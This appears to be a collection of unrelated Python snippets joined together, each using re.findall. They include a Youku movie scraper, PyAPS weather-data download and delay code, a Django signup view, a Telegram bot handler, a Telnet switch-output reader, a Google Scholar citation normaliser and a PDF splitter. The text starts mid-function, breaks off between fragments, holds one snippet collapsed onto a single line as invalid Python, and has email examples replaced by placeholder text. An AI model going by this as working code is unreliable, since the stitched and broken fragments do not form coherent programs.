                            dan_lei = re.findall('target="_blank">(.*?)</a>', lei_s, re.S)
                            z_lei = ''
                            for aa in dan_lei:
                                z_lei += aa
                            info.append(z_lei)
                        except IndexError as e:
                            info.append('')
                        if info[2] != '':
                            movies = Movies(moviesname=info[1],
                                            moviessource='优酷视频',
                                            moviesgrade=info[3],
                                            movieslanguage=info[6],
                                            moviestype=info[7],
                                            moviesdecade=info[4],
                                            moviesregion=info[5],
                                            pdatetime=info[4],
                                            moviesimageurl=info[2],
                                            moviesurl='https:' + info[0],
                                            moviesurl2='[]')
                            movies.save()
                            print('Successfully added one record +++++++++++++++++++++++++++++++++++++++++++++++++++')
                        else:
                            print('Saving the record failed .............................................................')
                        # print(info[:10])
                    elif len(Movies.objects.filter(moviesname=info[1])) >= 1:
                        print('This record has already been added !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
                        print(info)
                else:
                    print('This record has already been added !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
                    print(info)
                info.clear()
def dload_grib_files(grib_files, tropo_model='ERA5', snwe=None):
    """Download weather re-analysis grib files using PyAPS
    Parameters: grib_files : list of string of grib files
    Returns:    grib_files : list of string
    """
    print('\n------------------------------------------------------------------------------')
    print('downloading weather model data using PyAPS ...')

    # Get date list to download (skip already downloaded files)
    grib_files_exist = check_exist_grib_file(grib_files, print_msg=True)
    grib_files2dload = sorted(list(set(grib_files) - set(grib_files_exist)))
    date_list2dload = [str(re.findall(r'\d{8}', i)[0]) for i in grib_files2dload]
    print('number of grib files to download: %d' % len(date_list2dload))
    print('------------------------------------------------------------------------------\n')

    # Download grib file using PyAPS
    if len(date_list2dload) > 0:
        hour = re.findall(r'\d{8}[-_]\d{2}', grib_files2dload[0])[0].replace('-', '_').split('_')[1]
        grib_dir = os.path.dirname(grib_files2dload[0])

        # try 3 times to download, then use whatever downloaded to calculate delay
        i = 0
        while i < 3:
            i += 1
            try:
                if tropo_model in ['ERA5', 'ERAINT']:
                    pa.ECMWFdload(date_list2dload, hour, grib_dir,
                                  model=tropo_model, snwe=snwe,
                                  flist=grib_files2dload)
                elif tropo_model == 'MERRA':
                    pa.MERRAdload(date_list2dload, hour, grib_dir)
                elif tropo_model == 'NARR':
                    pa.NARRdload(date_list2dload, hour, grib_dir)
            except:
                if i < 3:
                    print('WARNING: the {} attempt to download failed, retry it.\n'.format(i))
                else:
                    print('\n\n' + '*' * 50)
                    print('WARNING: downloading failed for 3 times, stop trying and continue.')
                    print('*' * 50 + '\n\n')
                pass

    # check potentially corrupted files
    grib_files = check_exist_grib_file(grib_files, print_msg=False)
    return grib_files
def calculate_delay_timeseries(inps):
    """Calculate delay time-series and write it to HDF5 file.
    Parameters: inps : namespace, all input parameters
    Returns:    tropo_file : str, file name of ECMWF.h5
    """
    def get_dataset_size(fname):
        atr = readfile.read_attribute(fname)
        shape = (int(atr['LENGTH']), int(atr['WIDTH']))
        return shape

    # check existing tropo delay file
    if (ut.run_or_skip(out_file=inps.tropo_file, in_file=inps.grib_files, print_msg=False) == 'skip'
            and get_dataset_size(inps.tropo_file) == get_dataset_size(inps.geom_file)):
        print('{} file exists and is newer than all GRIB files, skip updating.'.format(inps.tropo_file))
        return

    # prepare geometry data
    geom_obj = geometry(inps.geom_file)
    geom_obj.open()
    inps.dem = geom_obj.read(datasetName='height')
    inps.inc = geom_obj.read(datasetName='incidenceAngle')
    if 'latitude' in geom_obj.datasetNames:
        # for dataset in geo OR radar coord with lookup table in radar-coord (isce, doris)
        inps.lat = geom_obj.read(datasetName='latitude')
        inps.lon = geom_obj.read(datasetName='longitude')
    elif 'Y_FIRST' in geom_obj.metadata:
        # for geo-coded dataset (gamma, roipac)
        inps.lat, inps.lon = ut.get_lat_lon(geom_obj.metadata)
    else:
        # for radar-coded dataset (gamma, roipac)
        inps.lat, inps.lon = ut.get_lat_lon_rdc(geom_obj.metadata)

    # calculate phase delay
    length, width = int(inps.atr['LENGTH']), int(inps.atr['WIDTH'])
    num_date = len(inps.grib_files)
    date_list = [str(re.findall(r'\d{8}', i)[0]) for i in inps.grib_files]
    tropo_data = np.zeros((num_date, length, width), np.float32)
    print('\n------------------------------------------------------------------------------')
    print('calculating absolute delay for each date using PyAPS (Jolivet et al., 2011; 2014) ...')
    print('number of grib files used: {}'.format(num_date))
    if not inps.verbose:
        prog_bar = ptime.progressBar(maxValue=num_date)
    for i in range(num_date):
        grib_file = inps.grib_files[i]
        tropo_data[i] = get_delay(grib_file, inps)
        if not inps.verbose:
            prog_bar.update(i + 1, suffix=os.path.basename(grib_file))
    if not inps.verbose:
        prog_bar.close()

    # remove metadata related with double reference
    # because absolute delay is calculated and saved
    for key in ['REF_DATE', 'REF_X', 'REF_Y', 'REF_LAT', 'REF_LON']:
        if key in inps.atr.keys():
            inps.atr.pop(key)

    # Write tropospheric delay to HDF5
    ts_obj = timeseries(inps.tropo_file)
    ts_obj.write2hdf5(data=tropo_data, dates=date_list, metadata=inps.atr)
    return inps.tropo_file
def signup(request):
    if request.method == 'POST':
        username = request.POST['username']
        password1 = request.POST['password']
        password2 = request.POST['repassword']
        email = request.POST['email']
        phone = request.POST['phone']
        address = request.POST['address']
        city = request.POST['city']
        try:
            prime = request.POST['prime']
            if prime == "on":
                prime = True
        except:
            prime = False
        state = request.POST['state']
        image = request.FILES['image']
        if User.objects.filter(username=username).exists():
            messages.error(request, 'Username already taken')
            return redirect('/user/signup/')
        elif not re.findall(r"^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w+$", email):
            # re.findall() returns a (possibly empty) list and never False,
            # so test for emptiness instead of comparing with False
            messages.error(request, 'Invalid Email')
            return redirect('/user/signup')
        elif User.objects.filter(email=email).exists():
            messages.error(request, "Email already taken")
            return redirect('/user/signup/')
        elif not phone.isnumeric():
            messages.error(request, "Invalid phone number")
            return redirect('/user/signup/')
        elif city.isalnum() and not city.isalpha():
            messages.error(request, "Invalid city name")
            return redirect('/user/signup/')
        elif password1 != password2:
            messages.error(request, "Password not matched")
            return redirect('/user/signup/')
        else:
            user = User.objects.create_user(username=username, password=password1, email=email)
            new_cust = Client.objects.create(user=user, phone=phone, address=address,
                                             city=city, prime=prime, state=state, image=image)
            new_cust.save()
            messages.info(request, "You have been added successfully !!")
            auth.login(request, user)
            return redirect("/")
    else:
        return render(request, 'signup.html')
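# A minimal sketch (not part of the original view) of how the same email check
# could be isolated and tightened with re.fullmatch, which implicitly anchors
# the whole string, so the explicit ^...$ anchors used above are not needed.
# The pattern itself is the one from the signup view; "user@example.com" is
# just a placeholder address for the demonstration.
import re

EMAIL_RE = re.compile(r"[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w+")

def is_valid_email(email):
    """Return True if the whole string matches the signup email pattern."""
    return EMAIL_RE.fullmatch(email) is not None

print(is_valid_email("user@example.com"))   # True
print(is_valid_email("not-an-email"))       # False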
def process_command(inputs, message):
    if message.get("text") is not None:
        if message.get("text").startswith("/"):
            # SERVICE MAINTENANCE CHECK
            if function_switch == "OFF":
                print("Service down for maintenance")
                return inputs["serviceDown"]
            print("Current request json {}".format(message))
            command_raw = message.get("text")
            bot_index_identifier = command_raw.find('@')
            if bot_index_identifier != -1:
                if command_raw[bot_index_identifier + 1:] != telegram_bot_name:
                    print("Not a command for Amaze bot, input command {}".format(command_raw[bot_index_identifier + 1:]))
                    raise ValueError()
                command_raw = command_raw[:bot_index_identifier]
            print("Found a new interaction with amaze bot for message: {}".format(command_raw))
            if inputs and command_raw in inputs:
                # authenticate command permission
                if not is_command_permitted(command_raw, message):
                    print("User not permitted for the command {}".format(command_raw))
                    return inputs["commandNotPermitted"]
                result_command = inputs[command_raw]
                print("Found resultCommand {}".format(result_command))
                command_keyword = re.findall("##.+##", result_command)
                if len(command_keyword) != 0:
                    print("Processing regex {} for result command {}".format(command_keyword[0], result_command))
                    try:
                        return result_command.replace(command_keyword[0], "\n" + format_command(inputs, message, command_keyword[0]))
                    except Exception as err:
                        return str(err)
                else:
                    return result_command
            else:
                print("Didn't find resultCommand for {}".format(command_raw))
                message["text"] = "/help"
                return inputs["default"], process_command(inputs, message)
        else:
            # SERVICE MAINTENANCE CHECK
            if function_switch == "OFF":
                print("Service down for maintenance")
                raise ValueError("Unable to handle operation")
            issue_number = re.findall(r"#\d{4}|#\d{3}", message.get("text"))
            if len(issue_number) != 0:
                print("Current request json {}".format(message))
                print("Found request for issue number {}".format(issue_number[0]))
                return git.parse_issue(issue_number[0][1:])
            elif message.get("text").startswith("## Issue explanation (write below this line)"):
                reporter_from = message.get("from")
                user_name = reporter_from.get("username")
                print("Found reporter {}, message {}".format(reporter_from, message.get("text")))
                return inputs["createissue"].format(git.create_issue(issue_create_uri, issue_token, message.get("text"), user_name))
            else:
                print("Unable to handle operation for chat id {}".format(message.get("chat").get("id")))
                raise ValueError("Unable to handle operation")
    elif message.get("new_chat_member"):
        # SERVICE MAINTENANCE CHECK
        if function_switch == "OFF":
            print("Service down for maintenance")
            raise ValueError("Unable to handle operation")
        print("Current request json {}".format(message))
        print("New member added to group: {}".format(message.get("new_chat_member")))
        return inputs["member"].format(message.get("new_chat_member").get("first_name")), inputs["member2"]
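# A quick illustration of the "##...##" placeholder handling above, using a
# made-up template string rather than the bot's real configuration: the
# placeholder is picked out with re.findall and then replaced, which is what
# format_command() feeds into in the handler.
import re

result_command = "Open issues:\n##list_open_issues##"   # hypothetical template
command_keyword = re.findall("##.+##", result_command)
print(command_keyword)                                   # ['##list_open_issues##']
print(result_command.replace(command_keyword[0], "issue #123, issue #124"))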
def get_code():
    r = requests.get('https://www.tianyancha.com/', headers=headers)
    code = re.findall(r'https://static.tianyancha.com/fonts-styles/css/(.*?)/font.css', r.text)[0]
    return code
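# Illustration only: the kind of stylesheet reference the regex above is
# looking for in the homepage HTML. The surrounding <link> tag and the
# version string "abc123" are invented for the example.
import re

sample_html = '<link href="https://static.tianyancha.com/fonts-styles/css/abc123/font.css" rel="stylesheet">'
print(re.findall(r'https://static.tianyancha.com/fonts-styles/css/(.*?)/font.css', sample_html))
# ['abc123']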
def get_kernel(kernels_raw):
    for kernel in re.findall(r"kernel.*?\s+(\S+)\s+\S+", kernels_raw, re.MULTILINE):
        yield kernel
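# A usage sketch for the generator above, assuming `import re` and the
# function are in scope. The input is assumed to look like GRUB-style
# "kernel <image> <args...>" lines (this sample is invented); the regex
# captures the token after "kernel", i.e. the image path here.
sample = """kernel /boot/vmlinuz-5.4.0-42 ro quiet
kernel /boot/vmlinuz-5.8.1 ro single"""

for k in get_kernel(sample):
    print(k)
# /boot/vmlinuz-5.4.0-42
# /boot/vmlinuz-5.8.1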
for video in folders:
    images = os.listdir(os.getcwd() + '/' + str(video))
    current_path = os.getcwd() + "/" + str(video)
    for i in images:
        image_file_name = current_path + "/" + i
        img = cv2.imread(image_file_name, 0)
        faces = face_cascade.detectMultiScale(img, 1.3, 5)
        print(faces)
        t_h, t_w = img.shape
        for f in faces:
            x, y, w, h = [v for v in f]
            # drop face if it is smaller than 40 px
            if w < 40 or h < 40:
                continue
            # drop face if it is relatively too small in the frame
            if float(w) / float(t_w) < ratio or float(h) / float(t_h) < ratio:
                continue
            cv2.rectangle(img, (x, y), (x + w, y + h), (255, 255, 255))
            sub_face = img[y:y + h, x:x + w]
            resize_face = cv2.resize(sub_face, (48, 48))
            resize_face = cv2.equalizeHist(resize_face)
            id = re.findall(r'\d+', str(i))[0]
            face_file_name = current_path + "/" + str(id) + "face.jpg"
            cv2.imwrite(face_file_name, resize_face)
            print("saved " + face_file_name)
            # remove image file
            # os.remove(image_file_name)  ## uncomment to clean!
import re

pattern = r'[^@ ]+@[^@]+\.[^@]{3}'
com = re.compile(pattern)

string = '[email protected] [email protected] Raj@gmail [email protected]'
obj = re.findall(pattern, string)
if obj:
    print(obj)
else:
    print("no match found")
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 20 18:17:41 2020

@author: kisku
"""
import re

"""
a. A digit at the beginning of the string and a digit at the end of the string
b. A string that contains only whitespace characters or word characters
c. A string containing no whitespace characters
"""

text = "4 score and 7 years ago"   # sample input, not part of the original exercise

# a. digit at the beginning and a digit at the end of the string
re.findall(r"^\d.*\d$", text)

# b. string that contains only whitespace characters or word characters
re.findall(r"^[\w\s]+$", text)

# c. string containing no whitespace characters
re.findall(r"^\S+$", text)
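# A small self-check (not part of the original exercise) showing how the three
# patterns behave on a few invented test strings; re.fullmatch applies each
# pattern to the whole string, so the ^ and $ anchors can be dropped here.
import re

tests = ["1 plus 2 is 3", "hello world", "no_spaces_here", "  \t  "]
patterns = {
    "a. digit at both ends": r"\d.*\d",
    "b. only whitespace/word chars": r"[\w\s]+",
    "c. no whitespace chars": r"\S+",
}
for label, pat in patterns.items():
    matching = [t for t in tests if re.fullmatch(pat, t)]
    print(label, "->", matching)
# a. digit at both ends -> ['1 plus 2 is 3']
# b. only whitespace/word chars -> ['1 plus 2 is 3', 'hello world', 'no_spaces_here', '  \t  ']
# c. no whitespace chars -> ['no_spaces_here']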
os.chdir("L:\MitchumLab\Individual Lab Folders\XunliangLiu\CLAVATA_project\Infection_BIK_WT_2") def filetype(fn): if '.' in fn: return fn.split('.')[-1] else: print (fn, "is not a file name!") return -1 for root, dirs, files in os.walk('.'): for f in files: fext = filetype(f).lower() if filetype(f) != -1 else next if fext == 'tif' or fext == 'tiff': ## use 2-digit for plate# instand of 1-digit if re.findall("R\dP\d[A,B,C]\dT\d",f): newfn = "P0".join(f.split('P')) os.rename(root + '/' + f, root + '/' + newfn) print ("!!! Rename... ", f, "to", newfn) ## if file name end with '_', add a number at the end if f.split('.')[-2][-1] == '_': s=1 while True: jnt = '_' + str(s) newfn = jnt.join(f.split('_')) if not newfn in files: # if file name already exist, file# add 1 os.rename(root + '/' + f, root + '/' + newfn) break print ("filename ", newfn, "exist") s = s+1
def command_get_output(self):
    self.__command_output_list = []
    tn = self.__tn
    # Send CTRL+Z first to drop back to the initial prompt
    tn.write(b'\32\n')
    try:
        # Brute-force entry into system mode: send both the Cisco and Huawei
        # commands so that any device ends up in system view.
        # Try to enter system view
        tn.write(('system-view' + "\n").encode('utf-8'))
        # Send the enable command
        tn.write((self.__enable_command + "\n").encode('utf-8'))
    except:
        pass
    # Send a command so the device's system-mode prompt tag can be captured
    tn.write(self.__command_output_more_input_command.encode('utf-8'))
    # Wait one second for the output
    time.sleep(1)
    # print(tn.read_very_eager())
    sysmodtag = (re.findall(r'#|]', tn.read_very_eager().decode('utf-8'))[0]).encode('utf-8')
    print('!!!!!!!!!!!!', 'sysmodtag is:', sysmodtag, '!!!!!!!!!!!!!!')
    tn.write(self.__command_output_more_input_command.encode('utf-8'))
    # Show the command being sent
    print('Input command:', self.__command_input)
    # Send the command
    tn.write((self.__command_input + '\n').encode('utf-8'))
    # Store the command output in response; the first couple of reads are
    # usually empty rather than the expected output
    # time.sleep(0.5)
    response = tn.read_very_eager()
    # print('########', response, '##############')
    # If sysmodtag appears in response the output is complete; otherwise keep
    # sending the paging command to fetch the rest of the output
    while sysmodtag not in response:
        # Output not finished: send the command that continues paging
        tn.write(self.__command_output_more_input_command.encode('utf-8'))
        # Read the next chunk and use it to detect the end-of-output prompt
        # response = tn.read_until(self.__command_output_more_tag_prompt, timeout=0.5)
        response = tn.read_very_eager()
        # print('@@@@@@@@@@@@@@@@@', response, '@@@@@@@@@@@@@@@')
        # Copy the chunk into response_format
        response_format = response
        # Decode response_format
        response_format = response_format.decode('utf-8')
        # print(response_format)
        # Clean up response_format
        response_format = re.sub(r'-- \x08.*\x08', '', response_format)
        response_format = re.sub(r' ', '', response_format)
        response_format = re.sub(r'\s----.*16D', '', response_format)
        response_format = re.sub(r'.*16D\s*.*16D', '', response_format)
        response_format = re.sub(r' ----', '', response_format)
        response_format = re.sub(r' ', '', response_format)
        response_format = re.split(r'\r\n', response_format)
        # Drop lines of the output that are just the paging prompt
        for item in response_format:
            if self.__command_output_more_tag_prompt.decode('utf-8') in item:
                response_format.remove(item)
        # Append the command output lines to the list
        for item in response_format:
            print(item)
            self.__command_output_list.append(item)
        time.sleep(1)
        # Progress hint while fetching the output
        # print(response_format)
        # print('Getting command output, please wait.', n, 'lines command output had gotten.')
    # Report completion once the full output has been collected
    print('All command output had gotten!!!')
    # This code is no longer used, but keep it for now in case it is needed
    # else:
    #     print(2229)
    #     response_format = response
    #     print(response_format)
    #     response_format = response_format.decode('utf-8')
    #     response_format = re.split(r'\r\n', response_format)
    #     for item in response_format:
    #         print(item)
    # This code is no longer used, but keep it for now in case it is needed
    # Remove leftover lines that are not command output
    for item in self.__command_output_list:
        if self.__command_output_more_tag_prompt.decode('utf-8') in item:
            self.__command_output_list.remove(item)
    return self.__command_output_list
def f(self):
    for i in range(0, 1000, 100):
        if int(self.maxP.encode('utf-8')) <= i:
            pageSize = i
            break
    n_papers = 0        # to count normalized papers
    sum_citations = 0   # to count the total number of citations an author received
    counter = 0
    ncounter = 0
    acounter = 0
    bcounter = 0
    # accumulators (assumed fresh per call; the original may define these at module level)
    N_author_url = []
    author_names_list = []
    title_list = []
    Citations = []
    newCitations = []
    url_to_counter = []
    coAuths = []
    number_of_coauths = []
    n_citations = []
    # looping through pages to get all the publications
    for j in range(0, pageSize, 100):
        S_url = self.url + "&cstart=" + str(j) + "&pagesize=100"
        with urllib.request.urlopen(S_url) as my_url:
            page_html = my_url.read()
        page_soup = soup(page_html, "html.parser")
        if j == 0:
            Name = page_soup.find('div', {'id': 'gs_prf_in'})
            aTag = page_soup.findAll('td', {'class': 'gsc_rsb_std'})
        Titles = page_soup.findAll('td', {'class': 'gsc_a_t'})
        Citations_soup = page_soup.findAll('td', {'class': 'gsc_a_c'})
        Years = page_soup.findAll('td', {'class': 'gsc_a_y'})
        info_page = page_soup.findAll('a', {'class': 'gsc_a_at'})
        authors_soup = page_soup.findAll('div', {'class': 'gs_gray'})
        # loop to get all the pop-up urls and then collect the number of co-authors from there
        for author in info_page:
            Author_names_link = author["data-href"]
            user = Author_names_link[53:65]
            n_input = Author_names_link[-12:]
            n_author_url = ("https://scholar.google.com.au/citations?user=" + user +
                            "&hl=en#d=gs_md_cita-d&u=%2Fcitations%3Fview_op%3Dview_citation%26hl%3Den%26user%3D" +
                            user + "%26citation_for_view%3D" + user + "%3A" + n_input + "%26tzom%3D-330")
            N_author_url.append(n_author_url)
        less_authors_name = []
        for a in authors_soup:
            less_authors_name.append(a.text)
        for i in range(0, len(less_authors_name), 2):
            author_names_list.append(less_authors_name[i])
        for title in Titles:
            Title = title.a.text
            x = Title.encode('utf-8')
            title_list.append(x.decode('utf-8', 'ignore'))   # title_list has all the titles
        for c in Citations_soup:
            p = c.text.encode('utf-8')
            r = p.decode('utf-8', 'ignore')
            q = re.findall('[0-9]+', r)
            Citations.append(q)
    n_author_names_list = []
    for j in author_names_list:
        if '...' not in j:
            n_author_names_list.append(author_names_list[counter])
            counter += 1
            continue
        else:
            n_author_names_list.append('#')
            url_to_counter.append(counter)
            counter += 1
    if len(url_to_counter) != 0:
        driver = webdriver.Firefox()
        driver.implicitly_wait(0.2)
        for url in url_to_counter:
            print(url)
            print(N_author_url[url])
            driver.get(N_author_url[url])
            time.sleep(0.5)
            title = driver.find_elements_by_xpath('//div[@class="gsc_vcd_value"]')
            page_element = title[0].text
            print(page_element)
            coAuths.append(len(page_element.split(',')))
        driver.quit()
    for name in n_author_names_list:
        if name == '#':
            number_of_coauths.append(coAuths[acounter])
            acounter += 1
        else:
            number_of_coauths.append(len(name.split(',')))
    for entry in Citations:
        try:
            newCitations.append(entry[0])
        except:
            newCitations.append(0)
    # newCitations has all the citations as a list
    for element in range(len(title_list)):
        n_papers += 1 / number_of_coauths[element]
        n_citations.append(int(int(newCitations[element]) / number_of_coauths[element]))
    for k in newCitations:
        try:
            sum_citations += int(k)
        except:
            continue
    # print('a', title_list)
    # print('b', newCitations)
    # print('c', number_of_coauths)
    # print('d', n_citations)
    # print('e', int(n_papers))
    # print('f', int(sum(n_citations)))
    # print('g', int(sum(n_citations) / len(title_list)))
    for entity in range(len(title_list)):
        a = Author(Title_name=title_list[entity],
                   Citations=newCitations[entity],
                   CoAuthors=number_of_coauths[entity],
                   Normalized_citations=n_citations[entity])
        a.save()
    normalized_papers = int(n_papers)
    total_normalized_citations = int(sum(n_citations))
    # normalized_h_index = int(sum(n_citations) / len(title_list))
    nn_citations = n_citations[0:normalized_papers]
    nn_citations.sort(reverse=True)
    for i in nn_citations:
        ncounter += 1
        print(ncounter, i)
        if ncounter > i:
            normalized_h_index = ncounter - 1
            break
    return (normalized_papers, total_normalized_citations, normalized_h_index)
def get_external_ip():
    url = 'http://checkip.dyndns.org'
    requesty = urllib.request.urlopen(url).read().decode('utf-8')
    # escape the dots so they only match literal dots in the address
    externalIP = re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', requesty)
    return externalIP
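# Usage sketch for the function above (requires network access): the service
# returns a small HTML page containing the caller's address, so the returned
# list normally holds a single entry.
ips = get_external_ip()
print(ips[0] if ips else "no IP found")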
pdf_merger.append(firstpdf)
pdf_merger.merge(insertpage, secondpdf)
# # add a bookmark
# pdf_merger.addBookmark('This is a bookmark', 1)
pdf_merger.write('merge_pdf.pdf')


def split_by_num(filename, nums, password=None):
    filename = r'F:\研一下\量化投资资料\量化教材\Hands-On_Machine_Learning_for_Algorithmic_Trading.pdf'
    pdf_reader = PdfFileReader(open(filename, mode='rb'))
    pages = pdf_reader.getNumPages()
    outline = pdf_reader.getOutlines()
    outlinchapter = []
    outlinepage = [i + 18 for i in [8, 33, 65, 88, 119, 147, 175, 224, 260, 284, 312, 351, 389, 418, 441, 458]]
    for o in outline:
        res = re.findall(r"'/Title': '(.*?)', '/Page': IndirectObject\((.*?), 0\)", str(o), re.S)
        if res and 'Chapter' in res[0][0]:
            outlinchapter.append(res[0][0])
    # print(list(outlinedict[0].keys())[0], list(outlinedict[0].values())[0])
    outlinedict = [{i[0]: i[1]} for i in zip(outlinchapter, outlinepage)]
    for i in range(len(outlinedict)):
        pdf_writer = PdfFileWriter()
        split_pdf_name = list(outlinedict[i].keys())[0].replace(':', '') + '.pdf'
        start = list(outlinedict[i].values())[0]
        # the last chapter runs to the end of the document
        end = list(outlinedict[i + 1].values())[0] if i + 1 < len(outlinedict) else pages
        print(split_pdf_name)
        for p in range(int(start), int(end)):
            pdf_writer.addPage(pdf_reader.getPage(p))
        with open(split_pdf_name, 'wb') as out:
            pdf_writer.write(out)